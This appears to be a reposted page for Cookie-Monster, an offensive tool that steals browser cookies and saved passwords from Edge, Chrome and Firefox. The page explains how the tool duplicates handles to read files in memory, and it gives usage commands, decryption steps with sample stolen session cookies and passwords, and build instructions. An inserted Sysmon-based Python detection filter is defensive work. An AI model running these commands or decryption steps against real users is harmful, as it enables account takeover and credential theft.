[Open-Source Tool] - Cookie-Monster

Series - Information Security
1 [🔔] This is a tool from the internet whose safety is unknown; assess its safety yourself.
2 Cookie-Monster
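Steal browser cookies for Edge, Chrome and Firefox through a BOF or exe! Cookie-Monster will extract the WebKit master key, locate a browser process with a handle to the Cookies and Login Data files, duplicate the handle, and then filelessly download the target. Once the Cookies/Login Data files are downloaded, the Python decryption script can help extract those secrets!
The Firefox module parses profiles.ini, finds where the logins.json and key4.db files are located, and downloads them. A separate GitHub repository is referenced for offline decryption.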
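A detection-side view of the Chrome/Edge path described above, as an added example that is not part of Cookie-Monster or the original post: duplicating a handle out of chrome.exe or msedge.exe requires opening that process with the PROCESS_DUP_HANDLE right (0x0040), which Sysmon records in Event ID 10 (ProcessAccess). The code filters such events; it assumes Sysmon process-access logging is enabled, and the sample events, paths and PIDs are constructed.

```python
import ntpath

PROCESS_DUP_HANDLE = 0x0040  # right a caller needs on a process to use DuplicateHandle
BROWSERS = {"chrome.exe", "msedge.exe"}  # process names the page lists

# Constructed sample in the "Field: value" layout of Sysmon Event ID 10
# (ProcessAccess) messages; paths, PIDs and access masks are made up.
SAMPLE_EVENTS = r"""
SourceImage: C:\Program Files\Google\Chrome\Application\chrome.exe
TargetImage: C:\Program Files\Google\Chrome\Application\chrome.exe
TargetProcessId: 1337
GrantedAccess: 0x1478

SourceImage: C:\Users\Public\cookie-monster.exe
TargetImage: C:\Program Files\Google\Chrome\Application\chrome.exe
TargetProcessId: 1337
GrantedAccess: 0x1440

SourceImage: C:\Windows\System32\Taskmgr.exe
TargetImage: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
TargetProcessId: 4444
GrantedAccess: 0x1000

SourceImage: C:\Windows\System32\rundll32.exe
TargetImage: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
TargetProcessId: 4444
GrantedAccess: 0x40
"""

def parse_events(text):
    """Turn blank-line-separated 'Field: value' blocks into dicts."""
    return [dict(line.split(": ", 1) for line in block.splitlines() if ": " in line)
            for block in text.strip().split("\n\n")]

def suspicious_dup_handle(events, browsers=BROWSERS):
    """Flag a different image opening a browser process with PROCESS_DUP_HANDLE."""
    hits = []
    for ev in events:
        src, dst = ev.get("SourceImage", ""), ev.get("TargetImage", "")
        access = int(ev.get("GrantedAccess", "0x0"), 16)
        if (ntpath.basename(dst).lower() in browsers
                and src.lower() != dst.lower()  # the browser opening itself is expected
                and access & PROCESS_DUP_HANDLE):
            hits.append((ntpath.basename(src).lower(), ntpath.basename(dst).lower(),
                         ev.get("TargetProcessId"), hex(access)))
    return hits

if __name__ == "__main__":
    for hit in suspicious_dup_handle(parse_events(SAMPLE_EVENTS)):
        print("ALERT source=%s target=%s pid=%s access=%s" % hit)
```

The Firefox module reads files from the profile directory rather than duplicating handles, so this filter does not cover it.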
3 Usage
Usage: cookie-monster [ --chrome || --edge || --firefox || --chromeCookiePID <pid> || --chromeLoginDataPID <PID> || --edgeCookiePID <pid> || --edgeLoginDataPID <pid>]
cookie-monster Example:
cookie-monster --chrome
cookie-monster --edge
cookie-monster --firefox
cookie-monster --chromeCookiePID 1337
cookie-monster --chromeLoginDataPID 1337
cookie-monster --edgeCookiePID 4444
cookie-monster --edgeLoginDataPID 4444
cookie-monster Options:
--chrome, looks at all running processes and handles, if one matches chrome.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
--edge, looks at all running processes and handles, if one matches msedge.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
--firefox, looks for profiles.ini and locates the key4.db and logins.json file
--chromeCookiePID, if the PID of a chrome process with a handle to Cookies is known, specify the PID to duplicate its handle and copy the file
--chromeLoginDataPID, if the PID of a chrome process with a handle to Login Data is known, specify the PID to duplicate its handle and copy the file
--edgeCookiePID, if the PID of an edge process with a handle to Cookies is known, specify the PID to duplicate its handle and copy the file
--edgeLoginDataPID, if the PID of an edge process with a handle to Login Data is known, specify the PID to duplicate its handle and copy the file
4 EXE Usage
Cookie Monster Example:
cookie-monster.exe --all
Cookie Monster Options:
-h, --help Show this help message and exit
--all Run chrome, edge, and firefox methods
--edge Extract edge keys and download Cookies/Login Data file to PWD
--chrome Extract chrome keys and download Cookies/Login Data file to PWD
--firefox Locate firefox key and Cookies, does not make a copy of either file
5 Decryption Steps
- Install the required dependencies
pip3 install -r requirements.txt
- Base64-encode the WebKit master key
python3 base64-encode.py "\xec\xfc...."
- Decrypt the Chrome/Edge Cookies file
python .\decrypt.py "XHh..." --cookies ChromeCookie.db
Results Example:
-----------------------------------
Host: .github.com
Path: /
Name: dotcom_user
Cookie: KingOfTheNOPs
Expires: Oct 28 2024 21:25:22
Host: github.com
Path: /
Name: user_session
Cookie: x123.....
Expires: Nov 11 2023 21:25:22
- Decrypt the Chrome/Edge passwords file
python .\decrypt.py "XHh..." --passwords ChromePasswords.db
Results Example:
-----------------------------------
URL: https://test.com/
Username: tester
Password: McTesty
- Decrypt Firefox cookies and stored credentials: https://github.com/lclevy/firepwd
6 Installation
Before compiling, make sure Mingw-w64 and make are installed on Linux.
make
Compile the exe on Windows
gcc .\cookie-monster.c -o cookie-monster.exe -lshlwapi -lcrypt32
6.1 Download
Download and source code: the latest release and the source code can be found on GitHub.
